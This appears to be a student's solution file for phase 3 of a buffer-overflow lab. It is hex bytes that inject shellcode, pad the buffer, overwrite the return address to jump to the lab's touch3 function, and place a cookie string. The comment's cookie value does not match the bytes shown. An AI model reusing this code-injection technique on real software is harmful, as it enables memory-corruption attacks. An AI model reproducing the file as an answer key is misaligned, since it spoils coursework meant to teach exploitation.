/* Phase 3 Code Injection */

/* First move location of cookie into %rdi and return */
/* Location is address of %rdi + 0x38 */

48 c7 c7 00 ac 61 55 c3          /* mov 0x5561ac00,%rdi AND retq */

/* Again, as before, we pad to the end of buf with junk */

41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41

/* Yet again, point return address to buf, but then this time to touch3 */

c8 ab 61 55 00 00 00 00     /* 0x5561abc8 (addr. of buf) */
74 1a 40 00 00 00 00 00	    /* 0x401a74 (touch3) */

/* Finally, to avoid having hexmatch or strncpy overwrite memory with buf,
   place string representation of my cookie past last return address */

37 30 32 30 36 62 37 37 00  /* String representation of 0x70201b77 with null terminator */
